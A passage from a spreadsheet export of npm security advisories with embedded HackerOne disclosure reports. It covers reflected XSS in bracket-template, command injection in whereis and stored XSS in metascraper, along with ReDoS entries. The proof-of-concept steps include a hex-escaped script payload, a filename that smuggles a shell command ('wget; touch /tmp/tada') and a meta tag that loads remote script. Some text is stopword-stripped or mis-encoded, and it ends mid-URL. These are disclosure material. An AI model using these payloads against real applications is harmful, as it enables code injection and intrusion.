&lt;p&gt;This issue can be used by malicious user to exploit Reflected XSS against application  which outputs variables passed via GET parameters directly in template(s) without any sanitization.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-17T14:19:09.371Z</t>
  </si>
  <si>
    <t>2018-04-09T14:58:19.748Z</t>
  </si>
  <si>
    <t>This issue can be used by malicious user to exploit Reflected XSS against application  which outputs variables passed via GET parameters directly in template(s) without any sanitization.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Guys,  report Reflected XSS bracket template module. allows inject arbitrary JavaScript tag malicious code execute when variables read used directly template without sanitization.  Module  module name  bracket template version  1.1.5 npm page  https //www.npmjs.com/package/bracket template  Description  Minimal (Ã¼ber fast) Javascript engine compatible browsers.  Module Stats  Stats   51 downloads last day 209 downloads last week 835 downloads last month  ~10000 estimated downloads per year  Description  testing bracket template module, I"ve found possibility inject malicious  tag followed JavaScript code when values passed via used templates directly, without sanitization.  Steps Reproduce    install bracket template module   $ npm install bracket template   create sample aaplication, reads name url displays welcome message browser   // file const http = require("http") const bracket = require("bracket template").default const port = 8080  function createHTML(name) {     let tpl = `         [[ const n = "${name}"; ]]         Hello [[= n ]]     `     return bracket.compile(tpl) }  const requestHandler = (request, response) =  {     const name = request.url.split("=")[1]     response.writeHeader(200, { Â« Â»Content TypeÂ« Â»  Â« Â»text/htmlÂ« Â» });     response.write(createHTML(name)());     response.end(); }  const server = http.createServer(requestHandler)  server.listen(port, (err) =  {     (err) {         return console.log(err)     }     console.log(`server listening ${port}`) })   run application   $ node   open http //localhost 8080?name=bl4de browser. will notice expected result       now, try inject following malicious XSS payload  http //localhost 8080?name=bl4deconsole.log("XSS?"). will notice HTML special characters escaped       time, use following payload  http //localhost 8080/?name=bl4de x3cscript x3econsole.log( x22uh x20oh, x20XSS... x20 ( x22) x3c x2fscript x3e result browser dev tools console      When investigate HTML returned server, notice using  x[hex][hex] notation allows inject HTML special character crafts XSS payload  Hello bl4deconsole.log(Â« Â»uh oh, XSS...  (Â« Â»)  Also, noticed vector not detected built XSS protection (XSS Auditor) Blink/WebKit based browsers (Chromium, Safari, Chrome, Opera), causes additional risk anyone uses bracket template production application.  Supporting Material/References   issue found tested following setup    macOS HighSierra 10.13.3 v.8.9.3 npm v. 5.5.1 Chromium 66.0.3342.0, Safari 11.03 (with XSS Auditor enabled), Chrome 64.0.3282.167 (with XSS Auditor enabled)   Wrap   contacted maintainer let know  No opened issue related repository  No   Regards,  Rafal "bl4de" Janicki  Impact  issue used malicious user exploit Reflected XSS against application  outputs variables passed via parameters directly template(s) without sanitization. </t>
  </si>
  <si>
    <t>issue used malicious user exploit Reflected XSS against application  outputs variables passed via parameters directly template(s) without sanitization.</t>
  </si>
  <si>
    <t>Denial of Service</t>
  </si>
  <si>
    <t>/advisories/607</t>
  </si>
  <si>
    <t>2018-04-25T05:28:57.482+00:00</t>
  </si>
  <si>
    <t>http-proxy-agent</t>
  </si>
  <si>
    <t>https://www.npmjs.com/http-proxy-agent</t>
  </si>
  <si>
    <t>&lt;=2.0.0</t>
  </si>
  <si>
    <t>Regular Expression Denial of Service</t>
  </si>
  <si>
    <t>/advisories/606</t>
  </si>
  <si>
    <t>2018-04-25T05:25:08.333+00:00</t>
  </si>
  <si>
    <t>sshpk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sshpk</t>
  </si>
  <si>
    <t>&lt;1.14.1</t>
  </si>
  <si>
    <t>&gt;=1.14.1</t>
  </si>
  <si>
    <t>/advisories/605</t>
  </si>
  <si>
    <t>2018-04-25T03:56:12.241+00:00</t>
  </si>
  <si>
    <t>protobufjs</t>
  </si>
  <si>
    <t>https://www.npmjs.com/protobufjs</t>
  </si>
  <si>
    <t>&lt;5.0.3 || &gt;= 6.0.0 &lt;=6.8.5</t>
  </si>
  <si>
    <t>&gt;=5.0.3 &lt; 6.0.0 || &gt;=6.8.6</t>
  </si>
  <si>
    <t>`whereis` concatenates unsanitized input into exec() command</t>
  </si>
  <si>
    <t>/advisories/604</t>
  </si>
  <si>
    <t>2018-04-25T03:51:25.872+00:00</t>
  </si>
  <si>
    <t>whereis</t>
  </si>
  <si>
    <t>https://www.npmjs.com/whereis</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/319476.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to report command injection in &lt;code&gt;whereis&lt;/code&gt;&lt;br&gt;
It allows to inject arbitrary shell commands by trying to locate crafted filenames.&lt;/p&gt;
&lt;h1 id="module"&gt;Module&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;module name:&lt;/strong&gt; whereis&lt;br&gt;
&lt;strong&gt;version:&lt;/strong&gt; 0.4.0&lt;br&gt;
&lt;strong&gt;npm page:&lt;/strong&gt; &lt;code&gt;https://www.npmjs.com/package/whereis&lt;/code&gt;&lt;/p&gt;
&lt;h2 id="module-description"&gt;Module Description&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Simply get the first path to a bin on any system.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="module-stats"&gt;Module Stats&lt;/h2&gt;
&lt;p&gt;Stats&lt;br&gt;
101 downloads in the last day&lt;br&gt;
5 403 downloads in the last week&lt;br&gt;
18 945 downloads in the last month&lt;/p&gt;
&lt;p&gt;~227 340 estimated downloads per year [JUST FOR REFERENCE,  ~DOWNLOADS PER MONTH*12]&lt;/p&gt;
&lt;h1 id="vulnerability"&gt;Vulnerability&lt;/h1&gt;
&lt;h2 id="vulnerability-description"&gt;Vulnerability Description&lt;/h2&gt;
&lt;p&gt;File name argument is not properly escaped before being concatenated into the command that is passed to &lt;code&gt;exec()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;See lines &lt;a title="https://github.com/vvo/node-whereis/blob/master/index.js#L4-L12" href="/redirect?signature=e0afc8af220c3270c5129866ba7d14145c5cd559&amp;amp;url=https%3A%2F%2Fgithub.com%2Fvvo%2Fnode-whereis%2Fblob%2Fmaster%2Findex.js%23L4-L12" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://github.com/vvo/node-whereis/blob/master/index.js#L4-L12&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;whereis&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;whereis&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;filename&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;wget; touch /tmp/tada&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="nx"&gt;whereis&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;filename&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;err&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;path&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Observe file &lt;code&gt;/tmp/tada&lt;/code&gt; created.&lt;/p&gt;
&lt;h2 id="supporting-material-references"&gt;Supporting Material/References:&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Arch Linux Current&lt;/li&gt;
&lt;li&gt;Node.js 9.5.0&lt;/li&gt;
&lt;li&gt;npm 5.6.0&lt;/li&gt;
&lt;li&gt;bash 4.4.012&lt;/li&gt;
&lt;/ul&gt;
&lt;h1 id="wrap-up"&gt;Wrap up&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;I contacted the maintainer to let him know: N&lt;/li&gt;
&lt;li&gt;I opened an issue in the related repository: N&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="impact"&gt;Impact&lt;/h2&gt;
&lt;p&gt;For setups where unsanitized user input could end up in &lt;code&gt;whereis&lt;/code&gt; argument, users would be able to execute arbitrary shell commands.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>2018-02-25T06:53:14.046Z</t>
  </si>
  <si>
    <t>2018-03-28T06:17:58.607Z</t>
  </si>
  <si>
    <t>File name argument is not properly escaped before being concatenated into the command that is passed to exec().</t>
  </si>
  <si>
    <t>For setups where unsanitized user input could end up in whereis argument, users would be able to execute arbitrary shell commands.</t>
  </si>
  <si>
    <t xml:space="preserve">report command injection whereis allows inject arbitrary shell commands trying locate crafted filenames.  Module  module name  whereis version  0.4.0 npm page  https //www.npmjs.com/package/whereis  Module Description   Simply first path bin system.   Module Stats  Stats 101 downloads last day 5 403 downloads last week 18 945 downloads last month  ~227 340 estimated downloads per year [JUST REFERENCE,  ~DOWNLOADS PER MONTH*12]  Vulnerability  Vulnerability Description  File name argument not properly escaped concatenated command passed exec().  lines https //github.com/vvo/node whereis/blob/master/index.js#L4 L12  Steps Reproduce  var whereis = require("whereis"); var filename = "wget; touch /tmp/tada"; whereis(filename, function(err, path) {   console.log(path); });  Observe file /tmp/tada created.  Supporting Material/References    Arch Linux Current 9.5.0 npm 5.6.0 bash 4.4.012   Wrap   contacted maintainer let know  N opened issue related repository  N   Impact  setups unsanitized user input end whereis argument, users able execute arbitrary shell commands. </t>
  </si>
  <si>
    <t>setups unsanitized user input end whereis argument, users able execute arbitrary shell commands.</t>
  </si>
  <si>
    <t>[metascraper] Stored XSS in Open Graph meta properties read by metascrapper</t>
  </si>
  <si>
    <t>/advisories/603</t>
  </si>
  <si>
    <t>2018-04-25T03:47:14.936+00:00</t>
  </si>
  <si>
    <t>metascraper</t>
  </si>
  <si>
    <t>https://www.npmjs.com/metascraper</t>
  </si>
  <si>
    <t>https://hackerone.com/reports/309367.json</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hi Guys,&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;metascrapper&lt;/strong&gt; is vulnerable to Stored XSS via Open Graph metadata, if they are used in HTML without any sanitization.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module:&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;A library to easily scrape metadata from an article on the web using Open Graph metadata, regular HTML metadata, and series of fallbacks.&lt;/p&gt;
&lt;p&gt;&lt;a title="https://www.npmjs.com/package/metascraper" href="/redirect?signature=872e28da695f172296a6d23a380b3bf07d08e66c&amp;amp;url=https%3A%2F%2Fwww.npmjs.com%2Fpackage%2Fmetascraper" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;https://www.npmjs.com/package/metascraper&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Due to lack of HTML sanitization, there is possibility to embed malicious code in any of metadata read by &lt;code&gt;metascrapper&lt;/code&gt;. When library reads such metadata, there is no sanitization performed. If output from &lt;code&gt;metascrapper&lt;/code&gt; is used directly in HTML code, any HTML embed in metadata is executed in context of the page which load and render it.&lt;/p&gt;
&lt;h2 id="steps-to-reproduce"&gt;Steps To Reproduce:&lt;/h2&gt;
&lt;h3 id="this-part-of-poc-represents-an-attacker"&gt;This part of PoC represents An Attacker&lt;/h3&gt;
&lt;p&gt;An attacker needs to inject malicious code into any of Open Graph property.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;create website (I serve it via static server available at &lt;a title="http://127.0.0.1:8080" href="/redirect?signature=e2be312283bd203f381cde6e90f66eb2cc33ad3d&amp;amp;url=http%3A%2F%2F127.0.0.1%3A8080" target="_blank" rel="nofollow noopener noreferrer"&gt;&lt;span&gt;http://127.0.0.1:8080&lt;/span&gt;&lt;i class="icon-external-link"&gt;&lt;/i&gt;&lt;/a&gt;) witt the following content. Please take a look at payload embed in &lt;code&gt;og:site_name&lt;/code&gt; meta property:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;!doctype html&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;html&lt;/span&gt; &lt;span class="na"&gt;xmlns:og=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;http://ogp.me/ns#&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;lang=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;en&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;head&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;charset=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;utf8&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;title&amp;gt;&lt;/span&gt;metascraper&lt;span class="nt"&gt;&amp;lt;/title&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;property=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;og:description&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;The HR startups go to war.&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;property=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;og:image&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;image&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;property=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;og:site_name&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;&amp;#39;&amp;lt;script src=&amp;quot;http://127.0.0.1:8080/malware.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;property=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;og:title&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;test article&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;property=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;og:type&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;article&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;lt;meta&lt;/span&gt; &lt;span class="na"&gt;property=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;og:url&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;content=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;http://127.0.0.1:8080&amp;quot;&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/body&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;save it as &lt;code&gt;article.html&lt;/code&gt; in the root directory of the server runs on &lt;code&gt;http://127.0.0.1:8080&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;create &lt;code&gt;malware.js&lt;/code&gt; file with following content and save it in the same directory as &lt;code&gt;article.html&lt;/code&gt;:&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;alert(&amp;#39;Uh oh, I am very bad malware!&amp;#39;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please be aware that &lt;code&gt;JavaScript&lt;/code&gt; file with malicious code can be served from ANY place. This particular location is only for Poc.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;This represents an HTML page which can be &amp;quot;scrapped&amp;quot; with &lt;code&gt;metascrapper&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="this-part-of-poc-represents-legitimate-user-and-an-attack-itself"&gt;This part of PoC represents legitimate User and an attack itself&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;install &lt;code&gt;metascrapper&lt;/code&gt; and required dependiences (&lt;code&gt;got&lt;/code&gt; and &lt;code&gt;express&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ npm install metascrapper got express
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;create an app which will use &lt;code&gt;metascrapper&lt;/code&gt; to read webiste metadata. &lt;code&gt;127.0.0.1:8888&lt;/code&gt; is address of server which uses &lt;code&gt;metascrapper&lt;/code&gt;. &lt;code&gt;http://127.0.0.1:8080/article.html&lt;/code&gt; is &lt;strong&gt;target website&lt;/strong&gt;, where from metadata will be read:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight javascript"&gt;&lt;code&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;metascraper&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;metascraper&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;got&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;got&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;express&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;express&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;targetUrl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;http://127.0.0.1:8080/article.html&amp;#39;&lt;/span&gt;
&lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;app&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;express&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;/scrap&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{;&lt;/span&gt;
    &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;async&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="na"&gt;body&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;html&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="nx"&gt;url&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;got&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;targetUrl&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kr"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;metadata&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;metascraper&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
            &lt;span class="nx"&gt;html&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="nx"&gt;url&lt;/span&gt;
        &lt;span class="p"&gt;})&lt;/span&gt;
        &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;// see returned metadata in console:&lt;/span&gt;
        &lt;span class="cm"&gt;/*
            { author: null,
                date: null,
                description: &amp;#39;The HR startups go to war.&amp;#39;,
                image: &amp;#39;http://127.0.0.1:8080/image&amp;#39;,
                lang: &amp;#39;en&amp;#39;,
                logo: null,
                publisher: &amp;#39;&amp;lt;script src=&amp;quot;http://127.0.0.1:8080/malware.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&amp;#39;,
                title: &amp;#39;test article&amp;#39;,
                url: &amp;#39;http://127.0.0.1:8080/article.html&amp;#39; }
        */&lt;/span&gt;
        &lt;span class="c1"&gt;// display content of metadata.publisher in the browser&lt;/span&gt;
        &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;__html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;`
            &amp;lt;div&amp;gt;
                &amp;lt;p&amp;gt;site title: &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;title&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;lt;/p&amp;gt;
                &amp;lt;p&amp;gt;site publisher: &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;metadata&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;publisher&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;&amp;lt;/p&amp;gt;
            &amp;lt;/div&amp;gt;
        `&lt;/span&gt;
        &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;__html&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;})()&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;listen&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;8888&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Example app listening on port 8888!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;run above app:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ node app.js
&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;go to &lt;code&gt;http://127.0.0.1:8888/scrap&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;malicious JavaScript code embed in site metadata &lt;code&gt;og:site_name&lt;/code&gt; is executed:&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="#" class="markdown-attachment-link markdown-attachment-inline-reference" data-attachment-filename="1.png" data-attachment-link="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/373/68abc754876fe37cb8382a989ccf6199a46d5a30/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIPYISVSGZY2YQQCA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFcaDBeHYQK2BCCxrdZy9SK3A3X14%2B1%2Fo2m%2FCBdhIgQeiaJL4wsHQ78dmrLOi%2FFkus81if88VHw5LFQwGfWdr3D5A1S5CsWW4esj24p3FUt6ZBQn5hpi3JdmXMX%2BDu1QjqzJcjCrLif%2BwiwkjvD8QEujmImoreuMQZ5JR6xCghVJb1qeGNgiP73DslonGTBYW9JqcW61nTAp9j1Z7CAlbHNHF6PpisVI2Kp2dngHAPpfk0DynSHW0mseNzDmAGsZMA4a1HZ5RtO59UkR0Zo8czKPDg5CSJenolUG83IcbKbeXirUm88x8fIRtjtFn64ywLH83yVDVJlMPCKMT%2BrbeWDffgqQXXjs8lQ1T7jRfXjz3sJLOxpYdkSE%2FHnNj8ZHdovynDKalJS0zFP7lcyfpIXirrJGXKXhzq9897YB9pQ6DefomHqiA6enUaj1MoUKvAjXQlEl%2By3wvU%2BT0Ierli5Oc5e1XKhktqLZcXjkB9dSf5Ni6KDgUxHZHBbSMF8VN8GoGR0xuxQ5Zg%2BjgVJzzS8z5O3pO%2FcJ6RWxj%2BwW6RukLXLr%2BE%2BTv3DQaklyllEbhxChPemVFdqcQOf%2BEotIG9t9zQN3KKGDmGAoiZXs2QU%3D&amp;amp;X-Amz-SignedHeaders=host&amp;amp;X-Amz-Signature=c398d652a58003fa5a19c800560beb126f7cb0bd55a71f3af09880c53d6fb987" data-attachment-type="image/png"&gt;&lt;img src="https://hackerone-us-west-2-production-attachments.s3-us-west-2.amazonaws.com/000/257/373/68abc754876fe37cb8382a989ccf6199a46d5a30/1.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&amp;amp;X-Amz-Credential=ASIAIPYISVSGZY2YQQCA%2F20180703%2Fus-west-2%2Fs3%2Faws4_request&amp;amp;X-Amz-Date=20180703T075035Z&amp;amp;X-Amz-Expires=3600&amp;amp;X-Amz-Security-Token=FQoDYXdzEFcaDBeHYQK2BCCxrdZy9SK3A3X14%2B1%2Fo2m%2FCBdhIgQeiaJL4wsHQ78dmrLOi%2FFkus81if88VHw5LFQwGfWdr3D5A1S5CsWW4esj24p3FUt6ZBQn5hpi3JdmXMX%2BDu1QjqzJcjCrLif%2BwiwkjvD8QEujmImoreuMQZ5JR6xCghVJb1qeGNgiP73DslonGTBYW9JqcW61nTAp9j1Z7CAlbHNHF6PpisVI2Kp2dngHAPpfk0DynSHW0mseNzDmAGsZMA4a1HZ5RtO59UkR0Zo8czKPDg5CSJenolUG83IcbKbeXirUm88x8fIRtjtFn64ywLH83yVDVJlMPCKMT%2BrbeWDffgqQXXjs8lQ1T7jRfXjz3sJLOxpYdkSE%2FHnNj8ZHdovynDKalJS0zFP7lcyfpIXirrJGXKXhzq9897YB9pQ6DefomHqiA6enUaj1MoUKvAjXQlEl%2By3wvU%2BT0Ierli5Oc5e1XKhktqLZcXjkB9dSf5Ni6KDgUxHZHBbSMF8VN8GoGR0xuxQ5Zg%2BjgVJzzS8z5O3pO%2FcJ6